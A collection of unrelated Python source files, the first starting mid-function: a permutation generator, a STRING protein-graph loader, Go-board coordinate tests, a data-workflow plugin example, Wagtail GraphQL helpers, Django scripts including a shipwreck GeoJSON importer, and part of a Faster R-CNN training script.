rng = np.random.default_rng(seed)
p = np.array(arr)
seen = set()
count = 0
while True:
if count >= size:
break
rng.shuffle(p)
if not replace:
phash = hash(p.data.tobytes())
if phash not in seen:
seen.add(phash)
yield p
count += 1
else:
yield p
count += 1
def disorder_generator(
size: int,
values: Sequence[float],
conc: Union[float, Sequence[float]],
samples: int,
replace: bool = False,
seed=None,
):
"""Generates (optionally unique) random samples from a given 1-D array.
See Also
--------
random_permutations
Parameters
----------
size : int
The size of the output array.
values : Sequence of float
The values for filling the array. The size must match the size of the
concentrations. If one concentration is given the value-array must be of size 2.
conc : float or Sequence of float
The concentrations of the values. If a single concentration is given
it is interpreted as the concentration of the first of two values.
samples : int
The number of random arrays to generate.
replace : bool, optional
If `True`, only unique permutations are returned. The default is `True`.
seed : int, optional
A optional seed to initialize the random number generator.
Yields
------
perm : (N) np.ndarray
The randomly sampled arrays.
Examples
--------
>>> eps = disorder_generator(5, values=[0, +1], conc=[0.4, 0.6], samples=2, seed=0)
>>> next(eps)
array([1, 1, 1, 0, 0])
>>> next(eps)
array([0, 1, 1, 1, 0])
"""
ordered = create_subst_array(size, values, conc)
return random_permutations(ordered, samples, replace, seed)
|
"""
This file offers the methods to automatically retrieve the graph Sphingomonas hankookensis.
The graph is automatically retrieved from the STRING repository.
References
---------------------
Please cite the following if you use the data:
```bib
@article{szklarczyk2019string,
title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets},
author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others},
journal={Nucleic acids research},
volume={47},
number={D1},
pages={D607--D613},
year={2019},
publisher={Oxford University Press}
}
```
"""
from typing import Dict
from ..automatic_graph_retrieval import AutomaticallyRetrievedGraph
from ...ensmallen import Graph # pylint: disable=import-error
def SphingomonasHankookensis(
directed: bool = False,
preprocess: bool = True,
load_nodes: bool = True,
verbose: int = 2,
cache: bool = True,
cache_path: str = "graphs/string",
version: str = "links.v11.5",
**additional_graph_kwargs: Dict
) -> Graph:
"""Return new instance of the Sphingomonas hankookensis graph.
The graph is automatically retrieved from the STRING repository.
Parameters
-------------------
directed: bool = False
Wether to load the graph as directed or undirected.
By default false.
preprocess: bool = True
Whether to preprocess the graph to be loaded in
optimal time and memory.
load_nodes: bool = True,
Whether to load the nodes vocabulary or treat the nodes
simply as a numeric range.
verbose: int = 2,
Wether to show loading bars during the retrieval and building
of the graph.
cache: bool = True
Whether to use cache, i.e. download files only once
and preprocess them only once.
cache_path: str = "graphs"
Where to store the downloaded graphs.
version: str = "links.v11.5"
The version of the graph to retrieve.
The available versions are:
- homology.v11.5
- physical.links.v11.5
- links.v11.5
additional_graph_kwargs: Dict
Additional graph kwargs.
Returns
-----------------------
Instace of Sphingomonas hankookensis graph.
References
---------------------
Please cite the following if you use the data:
```bib
@article{szklarczyk2019string,
title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets},
author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others},
journal={Nucleic acids research},
volume={47},
number={D1},
pages={D607--D613},
year={2019},
publisher={Oxford University Press}
}
```
"""
return AutomaticallyRetrievedGraph(
graph_name="SphingomonasHankookensis",
repository="string",
version=version,
directed=directed,
preprocess=preprocess,
load_nodes=load_nodes,
verbose=verbose,
cache=cache,
cache_path=cache_path,
additional_graph_kwargs=additional_graph_kwargs
)()
|
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import numpy
import coords
import go
from tests import test_utils
class TestCoords(test_utils.MiniGoUnitTest):
def test_upperleft(self):
self.assertEqual(coords.parse_sgf_coords('aa'), (0, 0))
self.assertEqual(coords.unflatten_coords(0), (0, 0))
self.assertEqual(coords.parse_kgs_coords('A9'), (0, 0))
self.assertEqual(coords.parse_pygtp_coords((1,9)), (0, 0))
self.assertEqual(coords.unparse_sgf_coords((0, 0)), 'aa')
self.assertEqual(coords.flatten_coords((0, 0)), 0)
self.assertEqual(coords.to_human_coord((0, 0)), 'A9')
self.assertEqual(coords.unparse_pygtp_coords((0, 0)), (1, 9))
def test_topleft(self):
self.assertEqual(coords.parse_sgf_coords('ia'), (0, 8))
self.assertEqual(coords.unflatten_coords(8), (0, 8))
self.assertEqual(coords.parse_kgs_coords('J9'), (0, 8))
self.assertEqual(coords.parse_pygtp_coords((9,9)), (0, 8))
self.assertEqual(coords.unparse_sgf_coords((0, 8)), 'ia')
self.assertEqual(coords.flatten_coords((0, 8)), 8)
self.assertEqual(coords.to_human_coord((0, 8)), 'J9')
self.assertEqual(coords.unparse_pygtp_coords((0, 8)), (9, 9))
def test_pass(self):
self.assertEqual(coords.parse_sgf_coords(''), None)
self.assertEqual(coords.unflatten_coords(81), None)
self.assertEqual(coords.parse_kgs_coords('pass'), None)
self.assertEqual(coords.parse_pygtp_coords((0,0)), None)
self.assertEqual(coords.unparse_sgf_coords(None), '')
self.assertEqual(coords.flatten_coords(None), 81)
self.assertEqual(coords.to_human_coord(None), 'pass')
self.assertEqual(coords.unparse_pygtp_coords(None), (0, 0))
def test_parsing_9x9(self):
self.assertEqual(coords.parse_sgf_coords('aa'), (0, 0))
self.assertEqual(coords.parse_sgf_coords('ac'), (2, 0))
self.assertEqual(coords.parse_sgf_coords('ca'), (0, 2))
self.assertEqual(coords.parse_sgf_coords(''), None)
self.assertEqual(coords.unparse_sgf_coords(None), '')
self.assertEqual(
'aa',
coords.unparse_sgf_coords(coords.parse_sgf_coords('aa')))
self.assertEqual(
'sa',
coords.unparse_sgf_coords(coords.parse_sgf_coords('sa')))
self.assertEqual(
(1, 17),
coords.parse_sgf_coords(coords.unparse_sgf_coords((1, 17))))
self.assertEqual(coords.parse_kgs_coords('A1'), (8, 0))
self.assertEqual(coords.parse_kgs_coords('A9'), (0, 0))
self.assertEqual(coords.parse_kgs_coords('C2'), (7, 2))
self.assertEqual(coords.parse_kgs_coords('J2'), (7, 8))
self.assertEqual(coords.parse_pygtp_coords((1, 1)), (8, 0))
self.assertEqual(coords.parse_pygtp_coords((1, 9)), (0, 0))
self.assertEqual(coords.parse_pygtp_coords((3, 2)), (7, 2))
self.assertEqual(coords.unparse_pygtp_coords((8, 0)), (1, 1))
self.assertEqual(coords.unparse_pygtp_coords((0, 0)), (1, 9))
self.assertEqual(coords.unparse_pygtp_coords((7, 2)), (3, 2))
self.assertEqual(coords.to_human_coord((0,8)), 'J9')
self.assertEqual(coords.to_human_coord((8,0)), 'A1')
def test_flatten(self):
self.assertEqual(coords.flatten_coords((0, 0)), 0)
self.assertEqual(coords.flatten_coords((0, 3)), 3)
self.assertEqual(coords.flatten_coords((3, 0)), 27)
self.assertEqual(coords.unflatten_coords(27), (3, 0))
self.assertEqual(coords.unflatten_coords(10), (1, 1))
self.assertEqual(coords.unflatten_coords(80), (8, 8))
self.assertEqual(coords.flatten_coords(coords.unflatten_coords(10)), 10)
self.assertEqual(coords.unflatten_coords(coords.flatten_coords((5, 4))), (5, 4))
def test_unflatten_coords_ndindex_equivalence(self):
ndindices = list(numpy.ndindex(go.N, go.N))
flat_coords = list(range(go.N * go.N))
self.assertEqual(list(map(coords.unflatten_coords, flat_coords)), ndindices)
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, print_function
import pandas as pd
# The field class_name contains the name of the class to load to execute the
# plugin.
class_name = 'OntaskTestPlugin'
class OntaskTestPlugin(object):
"""
Example of a class that implements the OnTask plugin interface. The
objects of this class have to provide the following elements:
1. name: Plugin name show to the users.
2. description_txt: A string with the detailed description of what the
plugin does
3. input_column_names: A potentially empty list of column names (strings).
If the list is empty, the columns are selected by the userat execution
time.
4. output_column_names: Non empty list of names (strings) of the columns
to be used for the output of the transformation.
5. parameters: an optionally empty list with tuples with the following
structure:
('name', type, [list of allowed values], initial value, help_text)
These elements will be requested from the user before executing the
plugin through a form. The conditions on these values are:
- name must be a string
- type must be a string equal to "integer", "double", "string",
"datetime" or "boolean".
- The list of values is to restrict the
possible values
- The initial value must be of the type specified by the second
element.
- Help_text a string to show as help text
6. method "run" that receives:
- a pandas data frame with the data to process
- a string with the name of the key column that will be used to merge
the result.
- A dictionary of pairs (name, value) with the parameters described in
the previous element.
and returns a result Pandas data frame. This frame **must** have one
column with the key column name provided so that it can be properly
merged with the existing data.
"""
def __init__(self):
self.name = 'Test Plungin 2 Name'
self.description_txt = 'Test Plugin 2 Description Text'
self.input_column_names = ['A1', 'A2']
self.output_column_names = ['RESULT 3', 'RESULT 4']
self.parameters = [
('param string', 'string', ['v1', 'v2'], 'v1', 'help param string'),
('param integer', 'integer', [], None, 'help param integer'),
('param double', 'double', [1.2, 2.2, 3.2], None,
'help param double'),
('param boolean', 'boolean', [], True, 'help param boolean'),
('param datetime', 'datetime', [], '2018-05-25 18:03:00+09:30',
'help param datetime'),
('param datetime2', 'datetime',
[],
'2018-05-25 18:03:00+09:30',
'help param datetime'),
]
def run(self, data_frame, merge_key, parameters=dict):
"""
Method to overwrite. Receives a data frame wih a number of columns
stipulated by the num_column_input pair, the name of a key column and a
dictionary with parameters of the form name, value.
Runs the algorithm and returns a pandas data frame structure that is
merged with the existing data frame in the workflow using the merge_key.
:param data_frame: Input data for the plugin
:param merge_key: Name of the column key that will be used for merging
:param parameters: Dictionary with (name, value) pairs.
:return: a Pandas data_frame to merge with the existing one (must
contain a column with name merge_key)
"""
# Extract the key column from the given data frame
result = pd.DataFrame(data_frame[merge_key])
# Process the given data and create the result
result[self.output_column_names[0]] = \
data_frame[self.input_column_names[0]] + \
data_frame[self.input_column_names[1]]
result[self.output_column_names[1]] = \
data_frame[self.input_column_names[0]] - \
data_frame[self.input_column_names[1]]
return result
|
import dataclasses
from typing import Any, Callable, List, Optional, Type
from wagtail.core.blocks.field_block import CharBlock, FieldBlock, RichTextBlock
from wagtail.core.blocks.stream_block import StreamBlock
from wagtail.core.fields import StreamField
from wagtail.images.blocks import ImageChooserBlock
import strawberry
import strawberry.django
from strawberry.union import StrawberryUnion
from strawberry.utils.str_converters import capitalize_first, to_camel_case
from .scalars import HTML
def _make_type(
class_name: str, value_field_name: str, value_type: Type, from_data: Callable
) -> Type:
# TODO: don't use dataclasses
x = dataclasses.make_dataclass(
class_name, [("id", strawberry.ID), (value_field_name, value_type)]
)
x.from_data = classmethod(from_data)
return strawberry.type(x)
def get_type_for_stream_block(
block: StreamBlock,
class_name: str,
) -> Type:
types = set()
block_map = {}
for field_block in block.child_blocks.values():
name = class_name + capitalize_first(to_camel_case(field_block.name))
type_ = _get_type_for_field_block(field_block, name)
if isinstance(type_, StrawberryUnion):
assert type_.graphql_name
type_.graphql_name += "Values"
type_ = _make_type(name, "values", List[type_], None)
block_map[field_block.name] = type_
types.add(type_)
union_type = strawberry.union(
class_name, types=tuple(sorted(types, key=lambda x: str(x)))
)
union_type._block_map = block_map
return union_type
def _get_type_for_field_block(field_block: FieldBlock, name: str) -> Optional[Type]:
type_ = None
if isinstance(field_block, CharBlock):
def from_data(cls, data: dict) -> str:
return cls(id=data["id"], value=data["value"])
type_ = _make_type(name, "value", str, from_data)
elif isinstance(field_block, RichTextBlock):
def from_data(cls, data: dict) -> str:
return cls(id=data["id"], html=data["value"])
type_ = _make_type(name, "html", HTML, from_data)
elif isinstance(field_block, ImageChooserBlock):
def from_data(cls, data: dict) -> str:
return cls(id=data["id"], image=data["value"])
type_ = _make_type(name, "image", str, from_data)
elif isinstance(field_block, StreamBlock):
type_ = get_type_for_stream_block(field_block, name)
if type_ is None:
raise ValueError(f"Unknown type for {field_block}")
type_._origin_field_block = field_block # type: ignore
return type_
def _get_block(block: dict, parent_type: Type) -> Any:
block_type = parent_type._block_map.get(block["type"])
if not block_type:
return None
block_data = block.copy()
block_data.pop("type")
if type(block["value"]) is list:
# mmm
print("🌼🌼🌼")
print(block_type._type_definition.fields[1].__dict__)
block_value_type = block_type._type_definition.fields[1].type.of_type
value = [
_get_block(sub_block, block_value_type) for sub_block in block["value"]
]
print(block_type)
print(block_value_type)
print(value)
return block_type(id=block_data["id"], values=value)
return block_type.from_data(block_data)
def get_resolver_for_stream_field(field: StreamField, type: Type) -> Callable:
def _resolver(root: Any) -> List[type]:
raw_data = getattr(root, field.name)._raw_data
data = []
for block in raw_data:
block_data = _get_block(block, type)
if block_data:
data.append(block_data)
return data
return _resolver
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "irs990.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
|
import django
import json
import os
import sys
# Make sure we can see the parent directory to import
sys.path.append('../')
os.environ['DJANGO_SETTINGS_MODULE'] = 'shipwrecks.settings'
# Make sure Django is set up
django.setup()
# Now we can import our Django model(s)
from wrecks.models import Wreck
from wrecks.models import WreckType
from wrecks.models import SOURCE_CHOICES
# Import the GEOS library needed to create points
from django.contrib.gis.geos import Point
from django.contrib.gis.geos import GEOSGeometry
if __name__ == '__main__':
# Make sure we have specified a file to import
if len(sys.argv) < 2:
print 'You must specify a geojson file to import.'
print 'Usage: $ python import.py <geojson file>'
sys.exit()
# Open the GeoJSON file
json_filepath = sys.argv[-1]
try:
with open(json_filepath, 'r') as f:
data = json.loads(f.read())
except IOError:
sys.exit("Error opening GeoJSON file")
except ValueError:
sys.exit('Error: the file does not appear to be valid JSON.')
# Turn each feature into a Wreck model instance
for feature_dict in data['features']:
wreck = Wreck()
properties = feature_dict['properties']
# Figure out the source type
source_name = properties['source']
if source_name == 'enc_wrecks':
source = SOURCE_CHOICES[1][0]
else:
source = SOURCE_CHOICES[0][0]
# Figure out if the wreck type exists (and normalize the values)
wreck_type_value = properties['feature_type']
if not wreck_type_value:
wreck_type_value = 'Unknown'
else:
if wreck_type_value.startswith('Wrecks -'):
wreck_type_value = wreck_type_value.replace('Wrecks -', 'Wreck -')
wreck_type, created = WreckType.objects.get_or_create(name=wreck_type_value)
# Figure out the depth
if source_name == 'enc_wrecks':
# ENC Wrecks are always in meters
try:
depth_meters = float(properties['depth'])
except ValueError:
depth_meters = None
else:
if not properties['depth']:
depth_meters = None
else:
depth_value = properties['depth']
sounding = properties['sounding']
if 'meters' in sounding:
depth_meters = depth_value
elif 'feet' in sounding:
# Convert feet and tenths to meters
depth_meters = depth_value * 0.3048
elif 'fathoms' in sounding:
# Convert fathoms to meters
depth_meters = depth_value * 1.8288
else:
depth_meters = None
# Create the Point object from the lat and long
lat = feature_dict['geometry']['coordinates'][1]
lng = feature_dict['geometry']['coordinates'][0]
location_point = GEOSGeometry('POINT(%f %f)' % (lng, lat), srid='NADS83')
# Get the name or assign 'unknown'
vessel_name = properties['vessel_name']
if not vessel_name:
vessel_name = 'Unknown'
# Cast the year sunk into an integer
try:
year_sunk = int(properties['yearsunk'])
except ValueError:
year_sunk = None
wreck.name = vessel_name
wreck.history = properties['history']
wreck.wreck_type = wreck_type
wreck.year_sunk = year_sunk
wreck.source = source
wreck.source_identifier = feature_dict['id']
wreck.depth_meters = depth_meters
wreck.location = location_point
# Save the new wreck
wreck.save()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# File: train.py
import argparse
import itertools
import numpy as np
import os
import shutil
import cv2
import six
assert six.PY3, "FasterRCNN requires Python 3!"
import tensorflow as tf
import tqdm
import tensorpack.utils.viz as tpviz
from tensorpack import *
from tensorpack.tfutils import optimizer, collect_env_info
from tensorpack.tfutils.common import get_tf_version_tuple
from tensorpack.tfutils.summary import add_moving_summary
import model_frcnn
import model_mrcnn
from basemodel import image_preprocess, resnet_c4_backbone, resnet_conv5, resnet_fpn_backbone
from dataset import DetectionDataset
from config import finalize_configs, config as cfg
from data import get_all_anchors, get_all_anchors_fpn, get_eval_dataflow, get_train_dataflow
from eval import DetectionResult, predict_image, multithread_predict_dataflow, EvalCallback
from model_box import RPNAnchors, clip_boxes, crop_and_resize, roi_align
from model_cascade import CascadeRCNNHead
from model_fpn import fpn_model, generate_fpn_proposals, multilevel_roi_align, multilevel_rpn_losses
from model_frcnn import BoxProposals, FastRCNNHead, fastrcnn_outputs, fastrcnn_predictions, sample_fast_rcnn_targets
from model_mrcnn import maskrcnn_loss, maskrcnn_upXconv_head
from model_rpn import generate_rpn_proposals, rpn_head, rpn_losses
from viz import draw_annotation, draw_final_outputs, draw_predictions, draw_proposal_recall
try:
import horovod.tensorflow as hvd
except ImportError:
pass
class DetectionModel(ModelDesc):
def preprocess(self, image):
image = tf.expand_dims(image, 0)
image = image_preprocess(image, bgr=True)
return tf.transpose(image, [0, 3, 1, 2])
@property
def training(self):
return get_current_tower_context().is_training
def optimizer(self):
lr = tf.get_variable('learning_rate', initializer=0.003, trainable=False)
tf.summary.scalar('learning_rate-summary', lr)
# The learning rate in the config is set for 8 GPUs, and we use trainers with average=False.
lr = lr / 8.
opt = tf.train.MomentumOptimizer(lr, 0.9)
if cfg.TRAIN.NUM_GPUS < 8:
opt = optimizer.AccumGradOptimizer(opt, 8 // cfg.TRAIN.NUM_GPUS)
return opt
def get_inference_tensor_names(self):
"""
Returns two lists of tensor names to be used to create an inference callable.
Returns:
[str]: input names
[str]: output names
"""
out = ['output/boxes', 'output/scores', 'output/labels']
if cfg.MODE_MASK:
out.append('output/masks')
return ['image'], out
def build_graph(self, *inputs):
inputs = dict(zip(self.input_names, inputs))
image = self.preprocess(inputs['image']) # 1CHW
features = self.backbone(image)
anchor_inputs = {k: v for k, v in inputs.items() if k.startswith('anchor_')}
proposals, rpn_losses = self.rpn(image, features, anchor_inputs) # inputs?
targets = [inputs[k] for k in ['gt_boxes', 'gt_labels', 'gt_masks'] if k in inputs]
head_losses = self.roi_heads(image, features, proposals, targets)
if self.training:
wd_cost = regularize_cost(
'.*/W', l2_regularizer(cfg.TRAIN.WEIGHT_DECAY), name='wd_cost')
total_cost = tf.add_n(
rpn_losses + head_losses + [wd_cost], 'total_cost')
add_moving_summary(total_cost, wd_cost)
return total_cost
class ResNetC4Model(DetectionModel):
def inputs(self):
ret = [
tf.TensorSpec((None, None, 3), tf.float32, 'image'),
tf.TensorSpec((None, None, cfg.RPN.NUM_ANCHOR), tf.int32, 'anchor_labels'),
tf.TensorSpec((None, None, cfg.RPN.NUM_ANCHOR, 4), tf.float32, 'anchor_boxes'),
tf.TensorSpec((None, 4), tf.float32, 'gt_boxes'),
tf.TensorSpec((None,), tf.int64, 'gt_labels')] # all > 0
if cfg.MODE_MASK:
ret.append(
tf.TensorSpec((None, None, None), tf.uint8, 'gt_masks')
) # NR_GT x height x width
return ret
def backbone(self, image):
return [resnet_c4_backbone(image, cfg.BACKBONE.RESNET_NUM_BLOCKS[:3])]
def rpn(self, image, features, inputs):
featuremap = features[0]
rpn_label_logits, rpn_box_logits = rpn_head('rpn', featuremap, cfg.RPN.HEAD_DIM, cfg.RPN.NUM_ANCHOR)
anchors = RPNAnchors(get_all_anchors(), inputs['anchor_labels'], inputs['anchor_boxes'])
anchors = anchors.narrow_to(featuremap)
image_shape2d = tf.shape(image)[2:] # h,w
pred_boxes_decoded = anchors.decode_logits(rpn_box_logits) # fHxfWxNAx4, floatbox
proposal_boxes, proposal_scores = generate_rpn_proposals(
tf.reshape(pred_boxes_decoded, [-1, 4]),
tf.reshape(rpn_label_logits, [-1]),
image_shape2d,
cfg.RPN.TRAIN_PRE_NMS_TOPK if self.training else cfg.RPN.TEST_PRE_NMS_TOPK,
cfg.RPN.TRAIN_POST_NMS_TOPK if self.training else cfg.RPN.TEST_POST_NMS_TOPK)
if self.training:
losses = rpn_losses(
anchors.gt_labels, anchors.encoded_gt_boxes(), rpn_label_logits, rpn_box_logits)
else:
losses = []
return BoxProposals(proposal_boxes), losses
def roi_heads(self, image, features, proposals, targets):
image_shape2d = tf.shape(image)[2:] # h,w
featuremap = features[0]
gt_boxes, gt_labels, *_ = targets
if self.training:
# sample proposal boxes in training
proposals = sample_fast_rcnn_targets(proposals.boxes, gt_boxes, gt_labels)
# The boxes to be used to crop RoIs.
# Use all proposal boxes in inference
boxes_on_featuremap = proposals.boxes * (1.0 / cfg.RPN.ANCHOR_STRIDE)
roi_resized = roi_align(featuremap, boxes_on_featuremap, 14)
feature_fastrcnn = resnet_conv5(roi_resized, cfg.BACKBONE.RESNET_NUM_BLOCKS[-1]) # nxcx7x7
# Keep C5 feature to be shared with mask branch
feature_gap = GlobalAvgPooling('gap', feature_fastrcnn, data_format='channels_first')
fastrcnn_label_logits, fastrcnn_box_logits = fastrcnn_outputs('fastrcnn', feature_gap, cfg.DATA.NUM_CLASS)
fastrcnn_head = FastRCNNHead(proposals, fastrcnn_box_logits, fastrcnn_label_logits, gt_boxes,
tf.constant(cfg.FRCNN.BBOX_REG_WEIGHTS, dtype=tf.float32))
if self.training:
all_losses = fastrcnn_head.losses()
if cfg.MODE_MASK:
gt_masks = targets[2]
# maskrcnn loss
# In training, mask branch shares the same C5 feature.
fg_feature = tf.gather(feature_fastrcnn, proposals.fg_inds())
mask_logits = maskrcnn_upXconv_head(
'maskrcnn', fg_feature, cfg.DATA.NUM_CATEGORY, num_convs=0) # #fg x #cat x 14x14
target_masks_for_fg = crop_and_resize(
tf.expand_dims(gt_masks, 1),
proposals.fg_boxes(),
proposals.fg_inds_wrt_gt, 14,
pad_border=False) # nfg x 1x14x14
target_masks_for_fg = tf.squeeze(target_masks_for_fg, 1, 'sampled_fg_mask_targets')
all_losses.append(maskrcnn_loss(mask_logits, proposals.fg_labels(), target_masks_for_fg))
return all_losses
else:
decoded_boxes = fastrcnn_head.decoded_output_boxes()
decoded_boxes = clip_boxes(decoded_boxes, image_shape2d, name='fastrcnn_all_boxes')
label_scores = fastrcnn_head.output_scores(name='fastrcnn_all_scores')
final_boxes, final_scores, final_labels = fastrcnn_predictions(
decoded_boxes, label_scores, name_scope='output')
if cfg.MODE_MASK:
roi_resized = roi_align(featuremap, final_boxes * (1.0 / cfg.RPN.ANCHOR_STRIDE), 14)
feature_maskrcnn = resnet_conv5(roi_resized, cfg.BACKBONE.RESNET_NUM_BLOCKS[-1])
mask_logits = maskrcnn_upXconv_head(
'maskrcnn', feature_maskrcnn, cfg.DATA.NUM_CATEGORY, 0) # #result x #cat x 14x14
indices = tf.stack([tf.range(tf.size(final_labels)), tf.cast(final_labels, tf.int32) - 1], axis=1)
final_mask_logits = tf.gather_nd(mask_logits, indices) # #resultx14x14
tf.sigmoid(final_mask_logits, name='output/masks')
return []
class ResNetFPNModel(DetectionModel):
def inputs(self):
ret = [
tf.TensorSpec((None, None, 3), tf.float32, 'image')]
num_anchors = len(cfg.RPN.ANCHOR_RATIOS)
for k in range(len(cfg.FPN.ANCHOR_STRIDES)):
ret.extend([
tf.TensorSpec((None, None, num_anchors), tf.int32,
'anchor_labels_lvl{}'.format(k + 2)),
tf.TensorSpec((None, None, num_anchors, 4), tf.float32,
'anchor_boxes_lvl{}'.format(k + 2))])
ret.extend([
tf.TensorSpec((None, 4), tf.float32, 'gt_boxes'),
tf.TensorSpec((None,), tf.int64, 'gt_labels')]) # all > 0
if cfg.MODE_MASK:
ret.append(
tf.TensorSpec((None, None, None), tf.uint8, 'gt_masks')
) # NR_GT x height x width
return ret
def slice_feature_and_anchors(self, p23456, anchors):
for i, stride in enumerate(cfg.FPN.ANCHOR_STRIDES):
with tf.name_scope('FPN_slice_lvl{}'.format(i)):
anchors[i] = anchors[i].narrow_to(p23456[i])
def backbone(self, image):
c2345 = resnet_fpn_backbone(image, cfg.BACKBONE.RESNET_NUM_BLOCKS)
p23456 = fpn_model('fpn', c2345)
return p23456
def rpn(self, image, features, inputs):
assert len(cfg.RPN.ANCHOR_SIZES) == len(cfg.FPN.ANCHOR_STRIDES)
image_shape2d = tf.shape(image)[2:] # h,w
all_anchors_fpn = get_all_anchors_fpn()
multilevel_anchors = [RPNAnchors(
all_anchors_fpn[i],
inputs['anchor_labels_lvl{}'.format(i + 2)],
inputs['anchor_boxes_lvl{}'.format(i + 2)]) for i in range(len(all_anchors_fpn))]
self.slice_feature_and_anchors(features, multilevel_anchors)
# Multi-Level RPN Proposals
rpn_outputs = [rpn_head('rpn', pi, cfg.FPN.NUM_CHANNEL, len(cfg.RPN.ANCHOR_RATIOS))
for pi in features]
multilevel_label_logits = [k[0] for k in rpn_outputs]
multilevel_box_logits = [k[1] for k in rpn_outputs]
multilevel_pred_boxes = [anchor.decode_logits(logits)
for anchor, logits in zip(multilevel_anchors, multilevel_box_logits)]
proposal_boxes, proposal_scores = generate_fpn_proposals(
multilevel_pred_boxes, multilevel_label_logits, image_shape2d)
if self.training:
losses = multilevel_rpn_losses(
multilevel_anchors, multilevel_label_logits, multilevel_box_logits)
else:
losses = []
return BoxProposals(proposal_boxes), losses
def roi_heads(self, image, features, proposals, targets):
image_shape2d = tf.shape(image)[2:] # h,w
assert len(features) == 5, "Features have to be P23456!"
gt_boxes, gt_labels, *_ = targets
if self.training:
proposals = sample_fast_rcnn_targets(proposals.boxes, gt_boxes, gt_labels)
fastrcnn_head_func = getattr(model_frcnn, cfg.FPN.FRCNN_HEAD_FUNC)
if not cfg.FPN.CASCADE:
roi_feature_fastrcnn = multilevel_roi_align(features[:4], proposals.boxes, 7)
head_feature = fastrcnn_head_func('fastrcnn', roi_feature_fastrcnn)
fastrcnn_label_logits, fastrcnn_box_logits = fastrcnn_outputs(
'fastrcnn/outputs', head_feature, cfg.DATA.NUM_CLASS)
fastrcnn_head = FastRCNNHead(proposals, fastrcnn_box_logits, fastrcnn_label_logits,
gt_boxes, tf.constant(cfg.FRCNN.BBOX_REG_WEIGHTS, dtype=tf.float32))
else:
def roi_func(boxes):
return multilevel_roi_align(features[:4], boxes, 7)
fastrcnn_head = CascadeRCNNHead(
proposals, roi_func, fastrcnn_head_func,
(gt_boxes, gt_labels), image_shape2d, cfg.DATA.NUM_CLASS)
if self.training:
all_losses = fastrcnn_head.losses()
if cfg.MODE_MASK:
gt_masks = targets[2]
# maskrcnn loss
roi_feature_maskrcnn = multilevel_roi_align(
features[:4], proposals.fg_boxes(), 14,
name_scope='multilevel_roi_align_mask')
maskrcnn_head_func = getattr(model_mrcnn, cfg.FPN.MRCNN_HEAD_FUNC)
mask_logits = maskrcnn_head_func(
'maskrcnn', roi_feature_maskrcnn, cfg.DATA.NUM_CATEGORY) # #fg x #cat x 28 x 28
target_masks_for_fg = crop_and_resize(
tf.expand_dims(gt_masks, 1),
proposals.fg_boxes(),
proposals.fg_inds_wrt_gt, 28,
pad_border=False) # fg x 1x28x28
target_masks_for_fg = tf.squeeze(target_masks_for_fg, 1, 'sampled_fg_mask_targets')
all_losses.append(maskrcnn_loss(mask_logits, proposals.fg_labels(), target_masks_for_fg))
return all_losses
else:
decoded_boxes = fastrcnn_head.decoded_output_boxes()
decoded_boxes = clip_boxes(decoded_boxes, image_shape2d, name='fastrcnn_all_boxes')
label_scores = fastrcnn_head.output_scores(name='fastrcnn_all_scores')
final_boxes, final_scores, final_labels = fastrcnn_predictions(
decoded_boxes, label_scores, name_scope='output')
if cfg.MODE_MASK:
# Cascade inference needs roi transform with refined boxes.
roi_feature_maskrcnn = multilevel_roi_align(features[:4], final_boxes, 14)
maskrcnn_head_func = getattr(model_mrcnn, cfg.FPN.MRCNN_HEAD_FUNC)
mask_logits = maskrcnn_head_func(
'maskrcnn', roi_feature_maskrcnn, cfg.DATA.NUM_CATEGORY) # #fg x #cat x 28 x 28
indices = tf.stack([tf.range(tf.size(final_labels)), tf.cast(final_labels, tf.int32) - 1], axis=1)
final_mask_logits = tf.gather_nd(mask_logits, indices) # #resultx28x28
tf.sigmoid(final_mask_logits, name='output/masks')
return []
def do_visualize(model, model_path, nr_visualize=100, output_dir='output'):
"""
Visualize some intermediate results (proposals, raw predictions) inside the pipeline.
"""
df = get_train_dataflow() # we don't visualize mask stuff
df.reset_state()
pred = OfflinePredictor(PredictConfig(
model=model,
session_init=get_model_loader(model_path),
input_names=['image', 'gt_boxes', 'gt_labels'],
output_names=[
'generate_{}_proposals/boxes'.format('fpn' if cfg.MODE_FPN else 'rpn'),
'generate_{}_proposals/scores'.format('fpn' if cfg.MODE_FPN else 'rpn'),
'fastrcnn_all_scores',
'output/boxes',
'output/scores',
'output/labels',
]))
if os.path.isdir(output_dir):
shutil.rmtree(output_dir)
utils.fs.mkdir_p(output_dir)
with tqdm.tqdm(total=nr_visualize) as pbar:
for idx, dp in itertools.islice(enumerate(df), nr_visualize):
img, gt_boxes, gt_labels = dp['image'], dp['gt_boxes'], dp['gt_labels']
rpn_boxes, rpn_scores, all_scores, \
final_boxes, final_scores, final_labels = pred(img, gt_boxes, gt_labels)
# draw groundtruth boxes
gt_viz = draw_annotation(img, gt_boxes, gt_labels)
# draw best proposals for each groundtruth, to show recall
proposal_viz, good_proposals_ind = draw_proposal_recall(img, rpn_boxes, rpn_scores, gt_boxes)
# draw the scores for the above proposals
score_viz = draw_predictions(img, rpn_boxes[good_proposals_ind], all_scores[good_proposals_ind])
